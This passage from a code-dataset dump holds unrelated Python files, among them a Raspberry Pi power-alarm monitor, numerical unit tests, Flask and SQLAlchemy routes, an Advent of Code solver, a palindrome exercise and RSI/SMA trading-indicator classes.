The minimum voltage to trigger an alarm is: {2} and {3} alarms are required to trigger an alarm event'.format(adcNumber, readPeriodState, alarmMinVoltage, alarmNTriggers)\n for handler in alarmHandlers:\n handler.trigger(msg, logging.INFO)\n logger.debug(msg)\n #1.8V => 1023\n ADC_SCALE_TO_V = 1.8 / 1023\n\n #When numberOfAlarmsLeftToTrigger\n numberOfAlarmsLeftToTrigger = alarmNTriggers\n\n #Current state\n alarmState = AlarmState.OK\n\n #Read period\n readPeriod = readPeriodState\n\n #Trigger alarms with information in \n nextInfoTrigger = time.time() + infoPeriod\n logger.info('Going to trigger next information alarm at {0}'.format(time.strftime('%d %b %Y %H:%M:%S', time.gmtime(nextInfoTrigger))))\n\n while True:\n time.sleep(readPeriod)\n readPeriod = readPeriodState\n adcVal = wpi.analogRead(adcNumber)\n adcValVolts = adcVal * ADC_SCALE_TO_V\n statusMsg = 'State: {0} - read from ADC {1} value {2} => {3} (number of alarms to trigger: {4})'.format(alarmState, adcNumber, adcVal, adcValVolts, numberOfAlarmsLeftToTrigger)\n logger.debug(statusMsg)\n if (alarmState == AlarmState.OK):\n if (adcValVolts < alarmMinVoltage):\n logger.warning('Read voltage is less than the minimum voltage: {0} < {1}'.format(adcValVolts, alarmMinVoltage))\n #Force a faster refresh\n readPeriod = 1\n numberOfAlarmsLeftToTrigger = numberOfAlarmsLeftToTrigger - 1\n if (numberOfAlarmsLeftToTrigger < 1):\n alarmState = AlarmState.ALARM\n for handler in alarmHandlers:\n statusMsg = 'State: {0} - read from ADC {1} value {2} => {3} (number of alarms to trigger: {4})'.format(alarmState, adcNumber, adcVal, adcValVolts, numberOfAlarmsLeftToTrigger)\n handler.trigger(statusMsg, logging.CRITICAL)\n else:\n #The alarms must be consecutive\n numberOfAlarmsLeftToTrigger = alarmNTriggers\n else:\n if (adcValVolts < alarmMinVoltage):\n #Reset if still in alarm. 
The recovery must be consecutive\n numberOfAlarmsLeftToTrigger = 0\n else:\n logger.warning('Read voltage is greater than the minimum voltage: {0} >= {1}'.format(adcValVolts, alarmMinVoltage))\n numberOfAlarmsLeftToTrigger = numberOfAlarmsLeftToTrigger + 1\n if (numberOfAlarmsLeftToTrigger >= alarmNTriggers):\n alarmState = AlarmState.OK\n\n #Trigger info alarms\n if (time.time() > nextInfoTrigger):\n for handler in alarmHandlers:\n handler.trigger(statusMsg, logging.INFO)\n nextInfoTrigger = time.time() + infoPeriod\n logger.info('Going to trigger next information alarm at {0}'.format(time.strftime('%d %b %Y %H:%M:%S', time.gmtime(nextInfoTrigger))))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description = 'Measure the power on the defined ADC and trigger an alarm if the power is lower than a given value')\n parser.add_argument('-a', '--adc', type=int, default=1, help='ADC #')\n parser.add_argument('-p', '--period', type=float, default=2, help='Period at which the ADC value is read')\n parser.add_argument('-am', '--alarm_min', type=float, help='A measured voltage (in Volts) under this value is considered an alarming voltage', default = 0.7)\n parser.add_argument('-at', '--alarm_tri', type=int, help='An alarm is triggered if N consecutive alarming voltages are detected', default = 1)\n parser.add_argument('-eu', '--email_user', type=str, required=True, help='email username')\n parser.add_argument('-ep', '--email_pass', type=str, required=True, help='email password')\n parser.add_argument('-ed', '--email_dest', type=str, required=True, help='email destination')\n parser.add_argument('-ip', '--info_period', type=int, default=(3600 * 12), help='Send information (and heartbeat) with the current information every args.info_period seconds (even if no alarm was triggered)')\n parser.add_argument('-bp', '--buzzer_pin', type=int, default=27, help='Buzzer wiringpi pin')\n parser.add_argument('-bd', '--buzzer_duration', type=int, default=30, help='Buzzer alarm duration')\n logLevels = ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']\n parser.add_argument('-ll', '--log_level', type=str, default='INFO', help='Log level', choices = logLevels)\n\n args = parser.parse_args()\n loggingCriticalities = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR, 'CRITICAL': logging.CRITICAL}\n logger.setLevel(loggingCriticalities[args.log_level])\n consoleHandler.setLevel(loggingCriticalities[args.log_level])\n syslogHandler.setLevel(loggingCriticalities[args.log_level])\n\n alarmNTriggers = 1\n if (args.alarm_tri > 1):\n alarmNTriggers = args.alarm_tri\n\n #Setup\n wpi.wiringPiSetup()\n\n emailAlarmHandler = EMailAlarmHandler(args.email_user, args.email_pass, args.email_dest)\n buzzerAlarmHandler = BuzzerAlarmHandler(args.buzzer_pin, args.buzzer_duration)\n monitor(args.adc, args.period, args.alarm_min, args.alarm_tri, [emailAlarmHandler, buzzerAlarmHandler], args.info_period)\n\n","repo_name":"aneto0/powerdetector","sub_path":"powerdetector.py","file_name":"powerdetector.py","file_ext":"py","file_size_in_byte":10184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9539001992","text":"import os\nimport string\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom numpy.testing import assert_almost_equal, assert_equal, assert_raises\nfrom scipy.interpolate import interp1d\nimport netCDF4 as nc\n\nfrom pymarine.utils.numerical import (\n get_nearest_index,\n 
find_idx_nearest_val,\n ecdf2percentile,\n get_column_with_max_cumulative_value,\n get_range_from_string,\n extrap1d,\n loadmat,\n print_mat_nested,\n)\n\nDATA_DIR = \"data\"\nMATLAB_DATAFILE = \"RAO_7.mat\"\n\n\ndef test_get_nearest_index():\n data = np.linspace(0, 10, 27)\n index = get_nearest_index(data, 3)\n index_expected = 7\n\n assert_equal(index, index_expected)\n\n # check if an assertion error is raised\n data_array = np.array([3, 0, 2, 4, 2, 1])\n with assert_raises(AssertionError):\n get_nearest_index(data_array, value=2.1)\n\n\ndef test_find_idx_nearest_val():\n data = np.linspace(0, 10, 27)\n index = find_idx_nearest_val(data, 3)\n index_expected = 8\n\n assert_equal(index, index_expected)\n\n data_array = np.array([3, 0, 2, 4, 2, 1])\n a = find_idx_nearest_val(data_array, value=2.1)\n assert_equal(a, 4)\n\n data_array = np.array([3, 0, 2, 4, 2, 1, 2])\n a = find_idx_nearest_val(data_array, value=2.1)\n assert_equal(a, 6)\n\n data_array = np.array([3, 0, 2, 4, 2.11, 1, 2])\n a = find_idx_nearest_val(data_array, value=2.1)\n assert_equal(a, 4)\n\n\ndef test_ecdf2percentile():\n np.random.seed(0)\n number_of_observations = 100\n # generate random data variing in between 0 and 100\n x_data = 100 * np.random.rand(number_of_observations)\n # calculate the cumulative distribution function of this random data using statsmodel\n e_cdf = sm.distributions.empirical_distribution.ECDF(x_data)\n\n result = [\n ecdf2percentile(ecdf=e_cdf, percentile=x)\n for x in np.linspace(0, 1, 10, endpoint=False)\n ]\n result_expected = np.array(\n [\n 0.46954761925470656,\n 9.6098407893963067,\n 14.335328740904639,\n 26.538949093944542,\n 38.344151882577769,\n 46.865120164770161,\n 57.594649555617927,\n 65.632958946527339,\n 77.423368943421664,\n 89.177300078207978,\n ]\n )\n\n assert_almost_equal(result, result_expected)\n\n\ndef test_get_column_with_max_cumulative_value():\n np.random.seed(0)\n n_cols = 5\n n_rows = 10\n # create a 10 x 5 data frame with random values with columns named as A, B, C, etc\n data_frame = pd.DataFrame(\n np.random.random_sample((n_rows, n_cols)),\n columns=list(string.ascii_uppercase)[:n_cols],\n )\n # obtain the name of the column with the maximum cumulative value\n col1 = get_column_with_max_cumulative_value(data_frame)\n col2 = get_column_with_max_cumulative_value(data_frame, regular_expression=\"[ABC]\")\n\n assert_equal(col1, \"D\")\n assert_equal(col2, \"C\")\n\n\ndef test_get_range_from_string():\n r1 = get_range_from_string(\"0:10:2\")\n r1_expected = np.array([0.0, 2.0, 4.0, 6.0, 8.0, 10.0])\n assert_almost_equal(r1, r1_expected)\n\n r2 = get_range_from_string(\"0:7\")\n r2_expected = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])\n assert_almost_equal(r2, r2_expected)\n\n r3 = get_range_from_string(\"3:4:0.2\")\n r3_expected = np.array([3.0, 3.2, 3.4, 3.6, 3.8, 4.0])\n assert_almost_equal(r3, r3_expected)\n\n\ndef test_extrap1d():\n # create\n xp = np.linspace(0, 2 * np.pi, 20)\n yp = np.sin(xp)\n f_inter = interp1d(xp, yp)\n\n f_extra = extrap1d(f_inter)\n\n xp_new = np.linspace(-0.1 * np.pi, 2.1 * np.pi, 20)\n yp_new = f_extra(xp_new)\n\n yp_exp = np.array(\n [\n -0.3084645,\n 0.0487049,\n 0.3970778,\n 0.6922465,\n 0.8966717,\n 0.9843516,\n 0.9440572,\n 0.7807363,\n 0.5149139,\n 0.1801622,\n -0.1801622,\n -0.5149139,\n -0.7807363,\n -0.9440572,\n -0.9843516,\n -0.8966717,\n -0.6922465,\n -0.3970778,\n -0.0487049,\n 0.3084645,\n ]\n )\n\n debug_plot = False\n if debug_plot:\n import matplotlib.pyplot as plt\n\n plt.plot(xp_new, yp_new, \"-o\")\n 
plt.plot(xp, yp, \"x\")\n        plt.show()\n\n    assert_almost_equal(yp_new, yp_exp)\n\n\ndef test_load_matlab():\n    # construct the matlab and netcdf data file name\n    file_name = os.path.join(DATA_DIR, MATLAB_DATAFILE)\n    if not os.path.exists(file_name):\n        file_name = os.path.join(\"..\", file_name)\n    file_name_nc = os.path.splitext(file_name)[0] + \".nc\"\n    # read the matlab data and make a reference to the RAO data, which is a 24 x 250 x 6 array\n    data_ml = loadmat(filename=file_name)\n    data = data_ml[\"RAO\"]\n\n    # read the netcdf data\n    data_nc = nc.Dataset(file_name_nc)\n\n    # loop over the 6 DOF components\n    variable_base = \"TowO_ACC\"\n    for i_rao, dof_name in enumerate([\"AX\", \"AY\", \"AZ\", \"RXX\", \"RYY\", \"RZZ\"]):\n        # the matlab file contains complex rao component at the indices 0..5\n        rao_2d = data[:, :, i_rao]\n\n        # convert the complex values in 2 2D arrays with the magnitude and phase. Transpose as well\n        rao_abs = abs(rao_2d).T\n        rao_phase = np.angle(rao_2d).T\n\n        # the net cdf file contains the separate magnitude and phase of the complex stored as named arrays\n        rao_abs_nc = data_nc.variables[\"_\".join([variable_base, dof_name, \"abs\"])]\n        rao_phase_nc = data_nc.variables[\"_\".join([variable_base, dof_name, \"phase\"])]\n\n        # check if the 2D arrays are equal\n        assert_almost_equal(rao_abs, rao_abs_nc)\n        assert_almost_equal(rao_phase, rao_phase_nc)\n\n    print_mat_nested(data)\n    print(data_nc.description)\n    print(data_nc.description)\n","repo_name":"eelcovv/pymarine","sub_path":"tests/test_numerical.py","file_name":"test_numerical.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"6194142803","text":"from flask import Blueprint, jsonify, request\n\n\ndef add_skill_route(Skills, db):\n    add_skill_bp = Blueprint(\"add_skill\", __name__)\n\n    @add_skill_bp.route(\"/api/add_skill\", methods=[\"POST\"])\n    def add_skill():\n        \"\"\"Create a new skill from the posted JSON payload.\"\"\"\n        if request.method == \"POST\":\n            data = request.get_json()\n            name = data.get(\"name\")\n            category = data.get(\"category\")\n\n            new_skill = Skills(\n                name=name,\n                category=category,\n            )\n\n            db.session.add(new_skill)\n            db.session.commit()\n\n            return jsonify({\"message\": \"skill added successfully\"})\n\n    return add_skill_bp\n","repo_name":"WomenPlusPlus/deploy-impact-23-shift-4","sub_path":"server/routes/skills/add_skill.py","file_name":"add_skill.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"32285289465","text":"def calcTime(time):\n    hr, mi = time.split(\":\")\n    total = int(hr) * 60 + int(mi)\n    return total\n\n\ndef word(song, minus, m):\n    music = song\n    while len(music) < minus:\n        music += song\n    if len(music) > minus:\n        music = music[:minus]\n\n    # +1 so the final window of the repeated string is also checked\n    for i in range(0, len(music) - len(m) + 1, 1):\n        if music[i:i + len(m)] == m:\n            return True\n    return False\n\n    # for i in range(0,len(music)-len(m),1):\n    #     if music[i:i+len(m)] == m:\n    #         if m[-1]!=\"#\":\n    #             if i+len(m) Location:\n    return (\n        db_session.query(DBLocation)\n        .filter(DBLocation.id == location_id)\n        .first()\n    )\n\n\ndef get_by_name(db_session, *, name: str) -> Optional[Location]:\n    return db_session.query(DBLocation).filter(DBLocation.name == name).first()\n\n\ndef get_multi(db_session, *, skip=0, limit=100) -> List[Optional[Location]]:\n    return 
db_session.query(DBLocation).offset(skip).limit(limit).all()\n\n\ndef create(db_session, *, location_in: LocationInCreate) -> Location:\n location = DBLocation(name=location_in.name, address=location_in.address)\n db_session.add(location)\n db_session.commit()\n db_session.refresh(location)\n return location\n\n\ndef update(\n db_session, *, location: DBLocation, location_in: LocationInUpdate\n) -> Location:\n location_data = jsonable_encoder(location)\n for field in location_data:\n if field in location_in.fields:\n value_in = getattr(location_in, field)\n if value_in is not None:\n setattr(location, field, value_in)\n location.updated_at = str(datetime.datetime.now())\n db_session.add(location)\n db_session.commit()\n db_session.refresh(location)\n return location\n\n\ndef delete(db_session, *, location_id: int) -> bool:\n location = get(db_session, location_id=location_id)\n if location:\n db_session.delete(location)\n db_session.commit()\n return True\n return False\n","repo_name":"5legs/testapi","sub_path":"app/app/crud/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28445416682","text":"from inputs import test_input_1, test_input_3, challlenge_input\nfrom graph import Graph, dijsktra\n\ndoors = set()\nrooms = set()\n\ndef handle_next_position(position, w: str):\n if w == \"N\":\n new_doors = (position[0], position[1] + 1)\n new_room = (position[0], position[1] + 2)\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n elif w == \"E\":\n new_doors = (position[0] + 1, position[1])\n new_room = (position[0] + 2, position[1])\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n if w == \"W\":\n new_doors = (position[0] - 1, position[1])\n new_room = (position[0] - 2, position[1])\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n elif w == \"S\":\n new_doors = (position[0], position[1] - 1)\n new_room = (position[0], position[1] - 2)\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n\n\n\ndef parse_parentheses(s):\n x, y = 0, 0\n positions = []\n\n for c in s:\n if c == \"(\":\n positions.append((x, y))\n elif c == \")\":\n x, y = positions.pop()\n elif c == \"|\":\n x, y = positions[-1]\n else:\n x, y = handle_next_position((x, y), c)\n\n\n\ndef print_area():\n min_x = min(min([d[0] for d in doors]), min([r[0] for r in rooms])) - 1\n max_x = max(max([d[0] for d in doors]), max([r[0] for r in rooms])) + 1\n\n min_y = min(min([d[1] for d in doors]), min([r[1] for r in rooms])) - 1\n max_y = max(max([d[1] for d in doors]), max([r[1] for r in rooms])) + 1\n\n for y in range(max_y, min_y - 1, -1):\n for x in range(min_x, max_x + 1):\n if (x, y) == (0, 0):\n print(\"X\", end=\"\")\n elif (x, y) in doors:\n print(\"|\", end=\"\")\n elif (x, y) in rooms:\n print(\".\", end=\"\")\n else:\n print(\"#\", end=\"\")\n print()\n\nparse_parentheses(challlenge_input)\n\ng = Graph()\n\nfor room in rooms:\n\n place_north = (room[0], room[1] + 1)\n room_north = (room[0], room[1] + 2)\n place_south = (room[0], room[1] - 1)\n room_south = (room[0], room[1] - 2)\n place_east = (room[0] + 1, room[1])\n room_east = (room[0] + 2, room[1])\n place_west = (room[0] - 1, room[1])\n room_west = (room[0] - 2, room[1])\n\n if place_north in doors and room_north in rooms:\n g.add_edge(room, room_north, 1)\n\n if place_south in doors and room_south in rooms:\n g.add_edge(room, room_south, 1)\n\n if place_east in doors and 
room_east in rooms:\n        g.add_edge(room, room_east, 1)\n\n    if place_west in doors and room_west in rooms:\n        g.add_edge(room, room_west, 1)\n\n\nstart_north = (0, 1)\nstart_east = (1, 0)\nstart_south = (0, -1)\nstart_west = (-1, 0)\n\nif start_north in doors:\n    g.add_edge((0, 0), (0, 2), 1)\n\nif start_east in doors:\n    g.add_edge((0, 0), (2, 0), 1)\n\nif start_south in doors:\n    g.add_edge((0, 0), (0, -2), 1)\n\nif start_west in doors:\n    g.add_edge((0, 0), (-2, 0), 1)\n\npaths = {}\nprint(len(rooms))\nfor room in rooms:\n    paths[room] = len(dijsktra(g, (0, 0), room))\n\nm = max(paths, key=paths.get)\nprint(m, paths[m] - 1)\n\nprint(len([x for x in paths.values() if x - 1 >= 1000]))\n","repo_name":"rprusak/advent_of_code2018","sub_path":"20/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"8827004666","text":"## this module is only used to turn off the pi !!!\nimport socket\nimport time\nfrom threading import Thread\n\nclass sendtopi:\n    def __init__(self,HOST,PORT):\n        self.timedeta = time.time()\n        self.laststage = None\n        self.HOST = HOST\n        self.PORT = PORT\n\n    def senddata(self, data):\n        #if time.time() - self.timedeta > 1:# and data != self.laststage:\n        #    if data != self.laststage:\n        t0 = Thread(target=self.start, args=(data,))\n        t0.daemon = True\n        t0.start()\n        self.laststage = data\n        self.timedeta = time.time()\n\n    def start(self, data):\n        #try:\n        #print(data)\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect((self.HOST, self.PORT))\n        s.send(data)\n        # read the reply before closing - recv() on a closed socket raises OSError\n        reply = s.recv(1024)\n        s.close()\n        #except:\n        #print(\"false to connect\")\n        return reply\n","repo_name":"Cemu0/fallpesondetection","sub_path":"customlib/sendtopi.py","file_name":"sendtopi.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"42182875552","text":"from selenium.webdriver.common.by import By\nfrom pages.base_page import BasePage\n\nclass Footer(BasePage):\n\n    title_locator = (By.XPATH, '//p[text()=\"Product Collections\"]')\n    GOOGLE_PLAY_LINK = (By.XPATH, '//*[@id=\"footer-website\"]/div/div[3]/div/a[2]/img')\n\n    def check_product_collections_module_title_is_visible(self):\n        title = self.driver.find_element(*self.title_locator)\n        assert title.is_displayed(), \"Title is not visible\"\n\n    def check_leads_link_Google_Play(self):\n        self.driver.execute_script(\"window.scrollTo(100,document.body.scrollHeight);\")\n        google_play = self.driver.find_element(*self.GOOGLE_PLAY_LINK)\n        self.driver.execute_script(\"arguments[0].click();\", google_play)\n        self.driver.switch_to.window(self.driver.window_handles[1])\n        expected_title = 'OpenWeather'\n        assert '/play.google' in self.driver.current_url and expected_title in self.driver.title\n","repo_name":"AleksandrMax88/OpenWeatherPython","sub_path":"tests/test_pandoras_box/pages/footer.py","file_name":"footer.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"8848153365","text":"# -*- coding: utf-8 -*-\n\"\"\"Test Serializer.\"\"\"\nfrom briefy.plone.interfaces import IBriefyPloneJSONLayer\nfrom briefy.plone.testing import INTEGRATION_TESTING\nfrom plone import api\nfrom plone.app.testing import setRoles\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.restapi.interfaces import ISerializeToJson\nfrom zope.component import 
getMultiAdapter\nfrom zope.interface import directlyProvidedBy\nfrom zope.interface import directlyProvides\n\nimport unittest2 as unittest\n\n\nclass TestSerialization(unittest.TestCase):\n \"\"\"Test case for ISerializeToJson adapters.\"\"\"\n\n layer = INTEGRATION_TESTING\n\n def _create_content(self, portal):\n \"\"\"Create dummy content for our tests.\"\"\"\n en = portal['en']\n home = en['home']\n self.composite = home\n api.content.create(\n type='block_checker',\n id='block_1',\n container=home,\n title='Checker',\n description='Checker'\n )\n self.block_checker = home['block_1']\n for idx in range(1, 4):\n api.content.create(\n type='row_block_checker',\n id='row_{0}'.format(idx),\n container=self.block_checker,\n title='Row {0}'.format(idx),\n description='Row {0}'.format(idx)\n )\n\n def setUp(self):\n \"\"\"Setup testcase.\"\"\"\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n self._create_content(self.portal)\n\n def serialize(self, content):\n \"\"\"Run the serializer for this content.\"\"\"\n ifaces = [IBriefyPloneJSONLayer, ] + list(\n directlyProvidedBy(self.request)\n )\n directlyProvides(self.request, *ifaces)\n serializer = getMultiAdapter(\n (content, self.request), ISerializeToJson\n )\n return serializer()\n\n def test_composite(self):\n \"\"\"Test serialization of a Composite Page.\"\"\"\n content = self.composite\n data = self.serialize(content)\n self.assertEqual(data['@type'], 'composite')\n self.assertEqual(data['id'], 'home')\n self.assertEqual(data['items_total'], 1)\n self.assertIsNotNone(data['breadcrumbs'])\n # Style\n self.assertTrue(data['display_header'])\n self.assertTrue(data['display_footer'])\n # SEO\n self.assertEqual(\n data['canonical_url'],\n 'http://localhost:8080/home'\n )\n self.assertEqual(data['robots'], 'index')\n\n def test_block_checker(self):\n \"\"\"Test serialization of a Block Checker.\"\"\"\n content = self.block_checker\n data = self.serialize(content)\n self.assertEqual(data['@type'], 'block_checker')\n self.assertEqual(data['title'], 'Checker')\n self.assertEqual(data['items_total'], 3)\n self.assertIsNotNone(data['breadcrumbs'])\n # Style\n self.assertIsNone(data['css_class'])\n self.assertIsNone(data['style_background_color'])\n self.assertIsNone(data['style_color'])\n self.assertIsNone(data['style_margin'])\n self.assertIsNone(data['style_padding'])\n","repo_name":"BriefyHQ/briefy.plone","sub_path":"src/briefy/plone/adapters/tests/test_serializer.py","file_name":"test_serializer.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38601831881","text":"# may be a repetition classifier\r\nfrom .classifier import Classifier\r\nfrom .models.load import predict, load_data, load_model\r\n\r\nclass Query(Classifier):\r\n def __init__(self, config):\r\n self.config = config\r\n self.classified = False\r\n self.next_state = self.QUERIED\r\n self.words_list = ['什么',\r\n '再讲一遍']\r\n self.text_field, self.label_field = load_data(target=\"0\", config=config)\r\n self.model = load_model(\"FastText\", \"request.pt\", self.text_field, config)\r\n\r\n # cfg_needed, intention, sub-intention\r\n def get_intention(self):\r\n self.classified = False\r\n return True, \"welcome\", \"explanation\"\r\n\r\n\r\n def do_classification(self, sentence):\r\n if self.config.USE_MODEL:\r\n self.classified = predict(self.model, self.text_field, self.label_field, sentence, 
self.config)\r\n return self.next_state\r\n else:\r\n super().do_classification(sentence)\r\n","repo_name":"XLab-Tongji/SemanticAnalysis","sub_path":"AI/Classifiers/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9916675100","text":"#Ali Goldstein\r\n#program with a recursive function to calculate whether or not a string is a palindrome\r\n#8 May 2014\r\n\r\ndef isPalindrome(string):\r\n if len(string) == 1 or len (string) == 0:\r\n return True\r\n #seeing if the first and last character of the string is the same\r\n #if it is, doing it again\r\n if string[0]==string[-1]:\r\n if isPalindrome(string[1:-1]) == True:\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n#prompt user to enter a string and then print out if its a palindrome or not\r\nstring=input(\"Enter a string: \\n\")\r\nif isPalindrome(string) == True:\r\n print(\"Palindrome!\")\r\nif isPalindrome (string) == False:\r\n print(\"Not a palindrome!\")\r\n\r\n\r\n \r\n \r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/gldali005/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32913996262","text":"import pandas as pd\nimport numpy as np\n\n\nclass RSI():\n\n def __init__(self, data, time_period=14, overbought_level=70, oversold_level=30):\n self.data = data\n self.dates = data.Dates.tolist()\n # self.wk_days = data.WeekDays\n self.close = self.data.Close\n self.T = time_period\n self.overbought_level = overbought_level\n self.oversold_level = oversold_level\n self.signal_values_df = self.get_num_signal_df()\n self.num_sig_np_array = self.get_num_signal_np_array()\n self.cat_sig_list = self.get_cat_sig_labels()\n\n def get_num_signal_df(self):\n samples_num = len(self.data)\n num_sig_np_array = self.get_num_signal_np_array().values\n num_sig_dict = {\"Dates\":self.dates, \"Close\":self.close.values, \"SignalValues\":num_sig_np_array}\n num_sig_df = pd.DataFrame(num_sig_dict, index=range(samples_num))\n return num_sig_df\n\n def get_num_signal_np_array(self):\n \"\"\"Relative Strength Index (RSI) is a momentum oscillator that measures the speed and change of price movements.\n RSI oscillates between zero and 100. Traditionally, and according to Wilder, RSI is considered overbought when above 70 and oversold when below 30.\n Signals can also be generated by looking for divergences, failure swings and centerline crossovers.\n RSI can also be used to identify the general trend.\"\"\"\n\n ## get the price diff\n # delta = self.close.diff()[1:]\n delta = self.close.diff()\n\n ## positive gains (up) and negative gains (down) Series\n up, down = delta.copy(), delta.copy()\n up[up < 0] = 0\n down[down > 0] = 0\n\n # EMAs of ups and downs\n _gain = up.ewm(span=self.T, min_periods=self.T - 1).mean()\n _loss = down.abs().ewm(span=self.T, min_periods=self.T - 1).mean()\n\n RS = _gain / _loss\n result = pd.Series(100. - (100. / (1. 
+ RS)), name=\"RSI\")\n        # NOTE: despite its name this method returns a pandas Series;\n        # get_num_signal_df relies on calling .values on the result\n        # num_sig_np_array = np.asarray(result)\n        # return num_sig_np_array\n        return result\n\n    def get_cat_sig_labels(self):\n        signal = self.get_num_signal_np_array()\n        cat_sig_list_labels = []\n        for s in signal:\n            if s < self.oversold_level:\n                cat_sig_list_labels.append(\"Buy\")\n            elif s > self.overbought_level:\n                cat_sig_list_labels.append(\"Sell\")\n            else:\n                cat_sig_list_labels.append(\"Hold\")\n        return cat_sig_list_labels\n\n\n\n\nclass SMA_CrossOver():\n\n    def __init__(self, data, short_trend_period = 42, long_trend_period = 252, threshold = 5):\n        self.data = data\n        self.np_dates_array = data.index.values\n        self.dt_dates_list = data.index.date.tolist()\n        self.business_wk_days = data.Dates\n        self.close = self.data.Close\n        self.sttT = short_trend_period\n        self.lttT = long_trend_period\n        self.threshold = threshold\n        self.stt = self.get_stt_and_ltt()[0]\n        self.ltt = self.get_stt_and_ltt()[1]\n        self.short_term_trend_period = str(self.sttT) + \"d\"\n        self.long_term_trend_period = str(self.lttT) + \"d\"\n        self.sma_crossover_signal_info = \"-\".join([self.short_term_trend_period, self.long_term_trend_period])\n        self.signal_values_df = self.get_num_signal_df()\n        self.signal_labels_df = self.get_cat_signal_df()\n        self.signals_df = self.get_num_cat_signal_df()\n\n    def get_stt_and_ltt(self):\n        sst = np.round(self.close.rolling(window=self.sttT).mean(), 4)\n        ltt = np.round(self.close.rolling(window=self.lttT).mean(), 4)\n        return sst, ltt\n\n    def get_num_signal_df(self):\n        samples_num = len(self.data)\n        sst = np.round(self.close.rolling(window=self.sttT).mean(), 4)\n        ltt = np.round(self.close.rolling(window=self.lttT).mean(), 4)\n        signal_values = sst - ltt\n        num_sig_dict = {\"Dates\":self.dt_dates_list, \"Close\":self.close.values,\n                        \"SignalValues\": signal_values.values}\n        num_sig_df = pd.DataFrame(num_sig_dict, index=range(samples_num))\n        return num_sig_df\n\n    def get_num_signal_np_array(self):\n        \"\"\"\n        :return: 1d numpy array row vector (len(samples_num),) and with element types:numpy.float64\n        \"\"\"\n        num_sig = self.signal_values_df[\"SignalValues\"].values\n        return num_sig\n\n    def get_cat_signal_df(self):\n        samples_num = len(self.data)\n        stt_minus_ltt_signal = self.signal_values_df.SignalValues\n        # buy when the short-term trend is above the long-term trend by more than the\n        # threshold, sell when it is below by more than the threshold, otherwise hold\n        # (without the minus sign every value below +threshold would be labelled \"sell\")\n        signal = np.where(stt_minus_ltt_signal > self.threshold, \"buy\", \"hold\")\n        signal = np.where(stt_minus_ltt_signal < -self.threshold, \"sell\", signal)\n        sig_pos_dict = {\"Dates\": self.dt_dates_list, \"Close\": self.close.values,\n                        \"SignalPosition\": signal}\n        sig_pos_df = pd.DataFrame(sig_pos_dict, index=range(samples_num))\n        return sig_pos_df\n\n    def get_cat_signal_list(self):\n        \"\"\"\n        :return: list with length=len(samples_num) and with element types:str\n        \"\"\"\n        cat_sig = self.signal_labels_df[\"SignalPosition\"].tolist()\n        return cat_sig\n\n    def get_num_cat_signal_df(self):\n        stt_minus_ltt_signal_values = self.get_num_signal_df().SignalValues.values\n        signal_buy_sell_hold_position = self.get_cat_signal_df().SignalPosition.values\n        samples_num = len(self.data)\n        data_dict = {\"Dates\": self.dt_dates_list, \"Close\": self.close.values,\n                     \"SignalValues\": stt_minus_ltt_signal_values,\n                     \"SignalPosition\": signal_buy_sell_hold_position}\n        datadf = pd.DataFrame(data_dict, index=range(samples_num))\n        return 
datadf\n\n\n\n","repo_name":"xaviergoby/AI-Algorithmic-Trading-System","sub_path":"technical_indicators/technical_indicator_classes.py","file_name":"technical_indicator_classes.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"15656868939","text":"import json\nimport re\nimport canedge_browser\nimport mdf_iter\nfrom flask import Blueprint, jsonify, request\nfrom flask import current_app as app\nfrom canedge_datasource import cache\nfrom canedge_datasource.time_range import parse_time_range\n\nannotations = Blueprint('annotations', __name__)\n\n\n@annotations.route('/annotations', methods=['POST'])\ndef annotations_view():\n \"\"\"\n {\"annotation\":[NAME], [OPTIONAL]}\n\n Examples:\n {\"annotation\":\"session\", \"device\":\"AABBCCDD\"}\n {\"annotation\":\"split\", \"device\":\"AABBCCDD\"}\n \"\"\"\n\n # Caching\n @cache.memoize(timeout=50)\n def annotations_cache(req):\n\n res = []\n\n query_req = req[\"annotation\"].get(\"query\", \"\")\n try:\n 